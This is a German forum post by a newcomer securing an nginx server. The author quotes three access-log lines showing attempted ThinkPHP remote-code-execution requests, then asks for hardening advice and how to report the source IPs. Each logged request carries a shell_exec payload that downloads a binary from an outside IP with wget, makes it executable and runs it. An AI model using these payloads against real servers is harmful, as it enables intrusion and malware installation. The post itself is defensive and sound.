ich setze mich momentan mit Webservern auseinander. Perspektivisch möchte ich eine eigene kleine Cloud via Nextcloud aufbauen. Um erst mal klein anzufangen, habe ich nginx, ufw und ssh installiert und konfiguriert. ssh ist natürlich nur per key zugang möglich und es sind alle Ports bis auf OpenSSH und nginx zu.
Dabei habe ich mich hauptsächlich an die Guides von DigitalOcean und Debian gehalten. Nun schaue ich mir interessiert die Logs an und finde:
Code: Alles auswählen
112.187.26.240 - - [13/Jul/2019:00:17:48 +0200] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://198.12.97.68/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0"
103.102.56.154 - - [13/Jul/2019:00:52:38 +0200] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://37.59.242.121/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0"
91.135.194.190 - - [13/Jul/2019:01:04:24 +0200] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://37.59.242.121/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0"
Wenn ich weiteres "Hardening" an meinen Server betreibe, reicht dann das Lesen von den Guides von DigitalOcean oder empfiehlt es sich, noch weitere Lektüre zu konsultieren? Muss / Kann man diese IP Adresse, die nur dazu da ist Viren zu verteilen irgendwo melden?
Ich lese schonmal, wie man für solche IP Addressen eine Blacklist konfiguriert, wollte mir aber dennoch ein paar Tipps einholen und halt wissen, ob jemand zeit und lust hat mir noch ein paar tipps auf den Weg zugeben.
Vielen Dank für Tipps und Anregungen.